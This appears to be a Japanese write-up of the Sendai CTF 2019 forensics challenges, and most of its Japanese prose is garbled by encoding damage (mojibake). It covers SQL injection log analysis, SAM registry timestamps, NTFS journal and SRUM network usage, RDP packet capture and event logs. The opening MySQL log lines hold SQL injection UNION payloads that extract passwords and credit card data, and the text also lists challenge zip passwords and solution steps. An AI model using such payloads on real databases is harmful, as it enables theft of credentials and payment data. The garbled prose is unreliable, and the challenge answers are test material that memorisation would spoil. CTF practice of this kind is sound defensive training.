18 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE ''' IN (itemnum,sdesc,ldesc)
19 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'a' = 'a' UNION SELECT VERSION(),2,3,4 #' IN (itemnum,sdesc,ldesc)
20 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'b' = 'b' UNION SELECT email,2,3,4 FROM userdb #' IN (itemnum,sdesc,ldesc)
21 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'c' = 'c' UNION SELECT password,2,3,4 FROM userdb #' IN (itemnum,sdesc,ldesc)
22 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'd' = 'd' UNION SELECT email,passwd,3,4 FROM userdb #' IN (itemnum,sdesc,ldesc)
23 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'e' = 'e' UNION SELECT ccard,expdate,3,4 FROM orderdb #' IN (itemnum,sdesc,ldesc)
24 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'f' = 'f' UNION SELECT accountid,ccard,3,4 FROM orderdb #' IN (itemnum,sdesc,ldesc)
25 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE isnew = 'Y'
27 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE isnew = 'Y'
28 Query SELECT price FROM itemdb WHERE itemnum = '1003'
28 Query SELECT price FROM itemdb WHERE itemnum = '1008'
29 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE itemnum IN (1003,1008)
30 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE itemnum IN (1003,1008)
31 Query SELECT * FROM userdb WHERE email='[email protected]' AND passwd='9a582dbf148b2f3a86e9adcd2220cbe4'
32 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE isnew = 'Y'
33 Query SELECT price FROM itemdb WHERE itemnum = '1000'
33 Query SELECT price FROM itemdb WHERE itemnum = '1003'
33 Query SELECT price FROM itemdb WHERE itemnum = '1005'
33 Query SELECT price FROM itemdb WHERE itemnum = '1008'
33 Query SELECT price FROM itemdb WHERE itemnum = '1009'
33 Query SELECT price FROM itemdb WHERE itemnum = '1011'
33 Query SELECT price FROM itemdb WHERE itemnum = '1012'
33 Query SELECT price FROM itemdb WHERE itemnum = '1014'
34 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE itemnum IN (1000,1003,1005,1008,1009,1011,1012,1014)
35 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE itemnum IN (1000,1003,1005,1008,1009,1011,1012,1014)
36 Query SELECT orderdate, ordercost, orderitems, itemlist, ccard FROM orderdb WHERE accountid = '[email protected]' ORDER BY orderdate,ordertime
passwordé¢ä¿ã®ã¯ã¨ãªã¯ä»¥ä¸ã®3ã¤ã
ââ# strings DB�T�\[�o\[mysql\]���Omysql.log | grep Query | grep SELECT | grep pass
21 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'c' = 'c' UNION SELECT password,2,3,4 FROM userdb #' IN (itemnum,sdesc,ldesc)
22 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'd' = 'd' UNION SELECT email,passwd,3,4 FROM userdb #' IN (itemnum,sdesc,ldesc)
31 Query SELECT * FROM userdb WHERE email='[email protected]' AND passwd='9a582dbf148b2f3a86e9adcd2220cbe4'
ãã®ä¸ã®whereã®ä¸èº«ãå
¥åãããçµäºã
100
ï¼»åé¡ï¼½
ã»SQLã¤ã³ã¸ã§ã¯ã·ã§ã³ãå®è¡ããæ»æè
ã®ã¢ã«ã¦ã³ãå(Full name) ã¨ãã¹ã¯ã¼ããç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
[account name]-[password]
ä¾ï¼ ä»å°å¤ªé-qwerty
ï¼»åé¡ãã¡ã¤ã«åï¼½
NL03.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
D5E63184BC3E5F9FE8C4767E0D936AFD
é£ããã£ããå
ã®åé¡ã®ä»¥éã«ãã°ã¤ã³ãèµ·ããã®ã ã¨æããå
ã®SQLã¤ã³ã¸ã§ã¯ã·ã§ã³ã®å¾ã«èµ·ãã£ãç»é²ã ã¨æããããã¢ã«ã¦ã³ãã§ãã°ã¤ã³ããã®ã ã¨æã£ããããããããªãã¿ããã(ä»å°CTF 2019 NL3.SQLã¤ã³ã¸ã§ã¯ã·ã§ã³ 100)ãåèã«ãããregisterããã¼ã¯ã¼ãã ã£ãããã ãã¾ããDB,WEBã®ãã°è¨é²ãç
§ããåãããªãã¨ãããªãããã ãã¾ãããã¹ã¯ã¼ããããã·ã¥å¤ã«ãªã£ã¦ããã®ã§ãããããã¨ã«æ»ããªãã¨ãããªããã¨ã«æ³¨æã
For1.ãã¹ã¯ã¼ãå¤æ´æ¥æ
100
ï¼»åé¡ã®èæ¯ï¼½
ã¤ã³ã·ãã³ãçºçæ¥æï¼ 2019å¹´10æ27æ¥ï¼æ¥ï¼
ã»åå¼å
ã®ç¤¾å¡ãããæ©å¯æ
å ±ãæµåºãã¦ãããã¨ããã¡ã¼ã«ãå±ãã¾ããã調æ»ããçµæãéçºç°å¢ï¼â»ï¼ï¼ã®PCï¼å°ã«å¤é¨ããRDPæ¥ç¶ãããããããæ©å¯æ
å ±ãæµåºãã¦ãããã¨ãå¤æãã¾ããã
ã»ã¤ã³ã¿ã¼ãããããéçºç°å¢ã«RDPæ¥ç¶ãããã¨ã¯ç¤¾å
ã«ã¼ã«ã§ç¦æ¢ãã¦ãããããé¢ä¿è
ã«èãåã調æ»ããã¨ãããåé¡çºçã®åæ¥ãå§è¨å
社å¡ãéçºç¨PCããã³ããã¼ããã³ãã«ã¼ã¿ã¼ã®è¨å®ãç¡æã§å¤æ´ããã¤ã³ã¿ã¼ãããããã®RDPæ¥ç¶ã許å¯ãã¦ãããã¨ãå¤æãã¾ããã
ã»å§è¨å
社å¡ã¯ãRDPæ¥ç¶ã®è¨å®ãç¡æã§å¤æ´ãã¦ãã¾ã£ããã¨ã¯èªããããå¼·åºãªãã¹ã¯ã¼ããè¨å®ãã¦ãããä¸æ£ã¢ã¯ã»ã¹ã®åå ã¯ä»ã«ãããã¨ä¸»å¼µãã¦ãã¾ããã証è¨å
容ãäºè»¢ä¸è»¢ãã¦ãããäºå®ã¨ç°ãªã証è¨ããã¦ããå¯è½æ§ãããã¾ãã
ã»ããªãã¯ãäºå®é¢ä¿ã確èªããããããã©ã¬ã³ã¸ãã¯èª¿æ»ãå®æ½ãããã¨ã«ãã¾ããã
ï¼â»ï¼ï¼éçºç°å¢ã«ã¤ã㦠ã»éçºç°å¢ã¯ã社å
ãããã¯ã¼ã¯ã¨ã¯åãé¢ããã¦ãããéçºããã¸ã§ã¯ãã«æºããå¶æ¥é¨ç¤¾å¡ã¨å§è¨å
社å¡ã®ã¿ãå©ç¨ãã¦ããã
ã»éçºç°å¢ã¯ããã¼ããã³ãã«ã¼ã¿ã¼ã§ã¤ã³ã¿ã¼ãããæ¥ç¶ããã¦ãããéçºç¨PCï¼å°ãéçºç¨ãµã¼ãï¼å°ãè¨ç½®ããã¦ããã
ã¤ã³ã¿ã¼ãããã¯ãææ°ã©ã¤ãã©ãªã®ãã¦ã³ãã¼ããæ
å ±åéã«å©ç¨ãã¦ããããã®ä»ã®ç®çã§å©ç¨ãããã¨ã¯ç¦æ¢ããã¦ããã
ï¼»åé¡ï¼½
ã»ç¾ç¶ã®éçºç¨PCã«ã¯å¼·åºãªãã¹ã¯ã¼ããè¨å®ããã¦ãã¾ãããæ©å¯æ
å ±ãæµåºããå½æã¯èå¼±ãªãã¹ã¯ã¼ããè¨å®ããã¦ããå¯è½æ§ãããã¾ãã
ã»å§è¨å
社å¡ããæ
å ±æµåºã®é£çµ¡ãåãã¦ãããã¹ã¯ã¼ããå¤æ´ããçè·¡ããªãã確èªãããã¹ã¯ã¼ããå¤æ´ãããæ¥æãç¹å®ãã¦ãã ããããªããæ©å¯æ
å ±ãæµåºãã¦ããã¨ããã¡ã¼ã«ãå±ããæ¥æã¯ã2019å¹´10æ27æ¥09:00ã§ãã
ï¼»ãã©ã°ï¼½
éçºç¨PCã®ã¦ã¼ã¶ã¼ãdevelopãã®ãã¹ã¯ã¼ãæçµå¤æ´æ¥æï¼åè§ãyyyy/mm/dd-hh:mm:ssï¼
ä¾ï¼ 2019/11/16-12:10:15
ï¼»åé¡ãã¡ã¤ã«åï¼½
For01.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
CBF0574061ED942D3139EE9250E9DBBE
ã¨ãããã¨ã§SAMãã¡ã¤ã«ã渡ãããã
ç¥è(SAM)
SAM
(Windows Forensic Analysis)ãåèã«ããããã°ã¤ã³æ
å ±ããã¹ã¯ã¼ãå¤æ´æ
å ±ãå
¥ã£ã¦ããããã ã
Registry Explorerã§ç¢ºèªããã
000003EAã«è¼ã£ã¦ããã®ãdevelopã¢ã«ã¦ã³ãã®æ
å ±ã®ããã ãã§ããæ¥æã¯è¦ããªããããããè¦ãããªãã®ããªã(ä»å°CTF 2019 For1.ãã¹ã¯ã¼ãå¤æ´æ¥æ 100)ãåèã«windows registry recoverãå
¥ãããããã¦ç¢ºèªããã
last write timestampã§ã確èªã§ããã®ãããããªãã
For2.éæ³åç»
100
ï¼»åé¡ï¼½
ã»å§è¨å
社å¡ãéçºç¨PCã«æ¥ç¶ãã¦ããUSBã¡ã¢ãªã«ã¯ãP2Pãããã¦ã³ãã¼ãããã¨æãããéæ³ãªåç»ãã¡ã¤ã«ãæ ¼ç´ããã¦ãã¾ããã
ã»éçºç¨PCã«éæ³ãªåç»ãã¡ã¤ã«ï¼ç¡æåç».zipï¼ãæ ¼ç´ããã¦ããçè·¡ããªãã確èªãã¦ãã ããã
ï¼»ãã©ã°ï¼½
éæ³ãªåç»ãã¡ã¤ã«ãç¡æåç».zipããåé¤ãããæ¥æï¼åè§ãyyyy/mm/dd-hh:mm:ssï¼
ä¾ï¼ 2019/11/16-12:10:15
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
A95F45192F4C6AB5907705B7B4903E92
ã¨ãããã¨ã§$Jãã¡ã¤ã«ã渡ããããããã ãã§è§£æãããã¨ã¯ãªãã®ã§ã©ããã¾ãããããNTFS Log Trackerã§èªã¿è¾¼ãããè¦ã¦ããããã°ãå¤ãã®ã§ãçã£ç«¯ããè¦ã¦ããã®ã¯é£ãããã ãä½ãããæ¤ç´¢ãã¦ãããããzipã¨ãã£ã¦ããã®ã§zpãæ¢ããçµæ§çµããã
ç¡æåç».zipããã¾ããã
æ¶ããã¦ãããã¿ããã
For3.éä¿¡å±¥æ´
100
ï¼»åé¡ï¼½
ã»å§è¨å
社å¡ã¯ãéçºç¨PCã«P2Pã½ãããShareããã¤ã³ã¹ãã¼ã«ãããã¨ã¯èªãã¾ããããåç»ãã¡ã¤ã«ããã¦ã³ãã¼ããããã¨ã¯ç¡ãã¨è¨¼è¨ãã¦ãã¾ãã
ã»ãShareãã®éä¿¡å±¥æ´ã調æ»ããæã大ããªãã¡ã¤ã«ããã¦ã³ãã¼ãããæ¥æã¨åä¿¡ãã¤ãæ°ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ããã°ã©ã ãShare.exeãã§æã大ããªãã¡ã¤ã«ããã¦ã³ãã¼ãããæ¥æã¨åä¿¡ãã¤ãæ°ï¼åè§ãyyyy/mm/dd-hh:mm:ss-nnnnï¼
ãâ»ãnãã¯ãã¤ãæ°
ä¾ï¼ 2019/11/16-12:10:00-1024
ï¼»åé¡ãã¡ã¤ã«åï¼½
For03.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
56DDB3D082D4D5824474382430B57416
ã¨ãããã¨ã§ãSRUDB.datã¨ãããã¡ã¤ã«ã渡ããããNTuser.datã¨ä¼¼ã¦ãããã®ãã¨æããã¬ã¸ã¹ããªãã¥ã¼ã¢ã«ã¶ã¡è¾¼ãã ãåå¿ãªããéãããã ã
éä¿¡éã¾ã§è¦ããã®ã¯ããããnetworkusageviewã§ç¢ºèªãããexeããã»ã¹ããããã解æã¯ãã«ãããSrumECmdãç¨ãã¦ãCSVãã¡ã¤ã«ã«ããã®ã¡ã«ã³ãã³ãã§æ¢ããã
ââ# cat 20240323041018_SrumECmd_NetworkUsages_Output.csv | grep share.exe
337,2019-10-23 10:35:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,69118,1880,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
372,2019-10-24 01:54:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,68269,1772,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
392,2019-10-24 02:54:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,136484,3760,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
418,2019-10-24 08:40:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,138367,5056,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
441,2019-10-24 10:24:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,138654,5110,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
499,2019-10-25 08:21:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,68150,1934,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
521,2019-10-25 09:47:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,137327,5758,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
558,2019-10-25 10:55:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,69600,3014,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
582,2019-10-26 03:24:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,138627,5434,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
622,2019-10-26 04:22:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,68816,2744,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
647,2019-10-26 06:00:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,138485,5704,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
693,2019-10-26 08:54:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,69789,2960,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
712,2019-10-26 09:16:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,84611350,301312,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
738,2019-10-27 02:49:00,\device\harddiskvolume2\users\develop\downloads\share.exe,,,UnknownOrUserSid,S-1-5-21-3589201120-3083077123-1171929968-1002,,1066,1564,68181,2042,1689399699963904,IF_TYPE_ETHERNET_CSMACD,0,0,
ã¨ããæãã§åºåãããããã®è¡¨ã§1564ã®æ¬¡ã®å¤ãåä¿¡ããbyteséã«ãªãããã®ä¸ããä¸çªå¤§ããã®ãæ¢ãã°çµäºã
Lab1.ãã±ãã解æ
100
ï¼»åé¡ã®èæ¯ï¼½
ã¤ã³ã·ãã³ãçºçæ¥æï¼ 2019å¹´10æ26æ¥ï¼åï¼
ã»ã¨ããä¼æ¥ã®å¤ãããªããèªå®
ã§SNSãé²è¦§ãã¦ããã¨ãããããã¡ã®ãµã¼ãã192.168.15.100ãã大éã®RDPã¢ã¯ã»ã¹åãã¦ããä»å°ã·ã¼ãã¼ã¨ãã®IPã¿ããã ãã©ä¹ã£åããã¦ããã®ãï¼ã¨ãããããã¡ã¤ã¢ã¦ã©ã¼ã«ã§é®æãã¦ãããããã¨æ稿ããã¦ãããã¨ãçºè¦ãã¾ããã ã»SNSã«æ稿ãããIPã¢ãã¬ã¹ã192.168.15.100ãã¯ãèªç¤¾DMZã®ã¤ã³ã¿ã¼ãããå´Firewallã«å²ãå½ã¦ããã¦ãããã®ã§ãããDMZå
é¨ã®ãµã¼ããã¤ã³ã¿ã¼ãããã«ã¢ã¯ã»ã¹ããéã¯ãåIPã¢ãã¬ã¹ã«NATå¤æããããããDMZå
ã®ã©ã®ãµã¼ããæ»æå
ã¨ãªã£ã¦ããã®ãã¯ä¸æã§ããã¾ããFirewallã§ã¯èª¿æ»ã«å½¹ç«ã¡ãããªãã°ã¯è¨é²ãã¦ãã¾ããã
ï¼»åé¡ï¼½
ã»DMZå
é¨ã§ãã£ããã£ãããã±ããã解æããã¤ã³ã¿ã¼ãããã«æ»æãã¦ãããµã¼ãã®IPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãããã¯ã¼ã¯ã¢ãã¬ã¹ï¼½
ã¤ã³ã¿ã¼ãããï¼ 192.168.15.0/24
DMZå
é¨ã»ã°ã¡ã³ãï¼192.168.100.0/24
ï¼»ãã©ã°ï¼½
å¤é¨ã«æ»æãã¦ãããµã¼ãã®IPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼ 192.168.100.10
ï¼»åé¡ãã¡ã¤ã«åï¼½
Lab01.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
69B3EA0B3265674C78E5066BD542521C
ã¨ãããã¨ã§pcapã渡ããããä»åã¯ãã±ãããå¤ãããªã®ã§ããã¤ãã®ããã«è§£æãã¦ããã
TCPéä¿¡ã主ã«è¡ããã¦ãããTPKT-ISO on TCP ã¨ãããããã³ã«ï¼ããããä½ã ããã
ã¨ã³ããã¤ã³ãã¯å°ãªããRDPã§ãã£ã«ã¿ããã¨1ã¤ã®IPã¢ãã¬ã¹ããéããã¦ãããéã£ãããã®ã¢ãã¬ã¹ãããªãããã ããã®èãæ¹ã¯ééã£ã¦ããã®ãï¼RDPã®éä¿¡å
ã¢ãã¬ã¹ãçãã ã£ããã¤ã¾ãããªã¢ã¼ãæ¥ç¶ãã¦ãã¼ã¿ãããã£ã¦ããæ¹ãæ»æãã¦ããã¨ãããã¨ãã
Lab2.ã¤ãã³ããã°è§£æ
100
ï¼»åé¡ï¼½
ã»DMZã«è¨ç½®ããã¦ããéçºç¨ãµã¼ãï¼Windows Server 2016ï¼ããã«ã¦ã§ã¢ã«ææããå¤é¨ã«RDPãã«ã¼ããã©ã¼ã¹æ»æãå®æ½ãã¦ãããã¨ãå¤æãã¾ãããéçºç¨ãµã¼ãã®ã¤ãã³ããã°ã解æããéçºç¨ãµã¼ãã«ä¸æ£ãã°ã¤ã³ããIPã¢ãã¬ã¹ã®ãã¡ã10ç§ä»¥ä¸ãã°ã¤ã³ãããã®ãç¹å®ãã¦ãã ããã
ã»ãªãã192.168.15.128ã¯ãéçºé¨éã·ã¹ãã 管çè
ãå©ç¨ãã¦ããéçºç¨PCã§ãããä¸æ£ãã°ã¤ã³ã§ã¯ããã¾ãããéçºç¨PCã¯2019å¹´10æ26æ¥ï¼åï¼20:16以éã¯å©ç¨ãã¦ããªãããããã®æå»ä»¥éã®éçºç¨ãµã¼ãã¸ã®RDPãã°ãªã³ã¯ãä¸æ£ãã°ã¤ã³ã¨ã¿ãªãã¦ãã ããã
ï¼»ãã©ã°ï¼½
éçºç¨ãµã¼ãã«ä¸æ£ãã°ã¤ã³ããIPã¢ãã¬ã¹ã®ãã¡ã10ç§ä»¥ä¸ãã°ã¤ã³ãããã®ï¼åè§ï¼
ä¾ï¼192.168.15.10
ï¼»åé¡ãã¡ã¤ã«åï¼½
Lab02.zip
ï¼»è£è¶³ï¼½
ãã¤ãã³ããã°ã¯ä»¥ä¸ãã©ã«ãã«æ ¼ç´ããã¦ãã¾ãã
ãLab02\Windows\System32\winevt\Logs
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
40991EF9BE481647DB82A5F2E7266840
ã¨ãããã¨ã§ãããã¤ãã®æ½åºãããã¢ã¼ãã£ãã¡ã¯ãã渡ããããã¤ãã³ããã°ã確èªããã¨ãããã¨ãè£è¶³ããæãããã§ãããã°ã¤ã³ãããã®ãè¦ã¤ããã®ã ãããï¼SANSã®ãã¤ã確èªããããsecurity.evtxã確èªãããã(ã¤ãã³ããã°è§£æãã¼ã«ã®ãããã)ã(Windowsã¤ãã³ããã°ã®ãã¡ã¹ããã©ã¬ã³ã¸ãã¯ãã¼ã«ãChainsaw)ã(Windowsã¤ãã³ããã°è§£æãã¼ã«ãHayabusaãã使ã£ã¦ã¿ã)ãè¦ãªãããhayabusaãç¨ãã¦è§£æãã¦ã¿ããGUIã§æä½ããããææçãããªãããããã¯ãhayabusaã§CSVã«ããã®ã¡ã«ã³ãã³ãã§è§£æãã¦ãããã¨æããã«ã¼ã«ãã¼ã¹ã§ãã§ãããããªã®ã§æ©ä¼ãããã°ãcat output.csv | grep 4624
4624ã®ã¤ãã³ãIDããã°ãªã³ã表ãã¦ãããããªã®ã§ããã§çµã£ããcat output.csv | grep 4624|grep RDP
RDPã§æ¥ç¶ãã¦ããã®ã§ããã§çµããæéã§èãããä¸ã¤ã«çµãããã
Lab3.ä¸å¯©ãã¦ã³ãã¼ã
100
ï¼»åé¡ï¼½
ã»éçºç¨ãµã¼ãã«ä¸æ£ãã°ã¤ã³ããæ»æè
ã¯ãWindowsæ¨æºã³ãã³ãã§ã¤ã³ã¿ã¼ãããããä¸å¯©ãã¡ã¤ã«ããã¦ã³ãã¼ãããããã§ããã¤ãã³ããã°ã解æããä¸å¯©ãã¡ã¤ã«ã®URLãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©ãã¡ã¤ã«ã®URLï¼åè§ï¼
ä¾ï¼ http://abc.example.com/malware.exe
ï¼»åé¡ãã¡ã¤ã«åï¼½
Lab02.zipï¼Lab02ã¨åãåé¡ãã¡ã¤ã«ï¼
ï¼»è£è¶³ï¼½
ãã¤ãã³ããã°ã¯ä»¥ä¸ãã©ã«ãã«æ ¼ç´ããã¦ãã¾ãã
ãLab02\Windows\System32\winevt\Logs
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
40991EF9BE481647DB82A5F2E7266840
ä¸å¯©ãã¡ã¤ã«ãã¤ã³ã¿ã¼ããããããã¦ã³ãã¼ãããããã ãã©ã®ã¤ãã³ããã°ãè¦ããããã®ãããããã(ã¤ãã³ããã°ä¸è¦§)ããã¯ãããããè³æãããããã¤ãã³ãIDã§æ¤ç´¢ãã¦ããããã®ãåºã¦ããªãã
ããã§ããã£ã¬ã¯ããªèªä½ã§ãã£ãºãã«è§£æãã¦"http"ã§æ¤ç´¢ãããä¸ä»¶åºã¦ãããå
¥åãããæ£è§£ããã¼ãè
ã«è½ã¡ãªãã(ä»å°CTF 2019 Lab3.ä¸å¯©ãã¦ã³ãã¼ã 100)ã»ãã®äººã®æ¹æ³ãè¦ãã
100
ï¼»åé¡ï¼½
ã»ç·´ç¿ç¨ä¸å¯©ããã°ã©ã ã解æããä¸å¯©ããã°ã©ã ããã¦ã³ãã¼ããããã¡ã¤ã«åï¼ä¿åå
ã®ãã«ãã¹ï¼ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©ããã°ã©ã ããã¦ã³ãã¼ããããã¡ã¤ã«åï¼ä¿åå
ã®ãã«ãã¹ï¼
ä¾ï¼ C:\work\list.txt
ï¼»åé¡ãã¡ã¤ã«åï¼½
Lab04.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
7A83747D8BEA2DE215845AB8C182D3A8
ã¨ãããã¨ã§ãexeãã¡ã¤ã«ã渡ããããstringsãããããã£ã½ããã¹ãããå
¥åãæ£è§£ã
100
ï¼»åé¡ï¼½
ã»ç·´ç¿ç¨ä¸å¯©ããã°ã©ã ã解æããä¸å¯©ããã°ã©ã ãåä½ããå¹´æãç¹å®ãã¦ãã ãããï¼ç¹å®ã®å¹´æ以å¤ã«èµ·åãããå ´åãä½ãå¦çããã«çµäºãã¾ããï¼
ï¼»ãã©ã°ï¼½
ä¸å¯©ããã°ã©ã ãåä½ããå¹´æï¼yyyy/mmãåè§ï¼
ä¾ï¼ 2019/11
ï¼»åé¡ãã¡ã¤ã«åï¼½
Lab05.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
FC7993EEB7FC27A724F8D06B0B987711
ãããã解æç¶ããã¾ãä»åº¦ã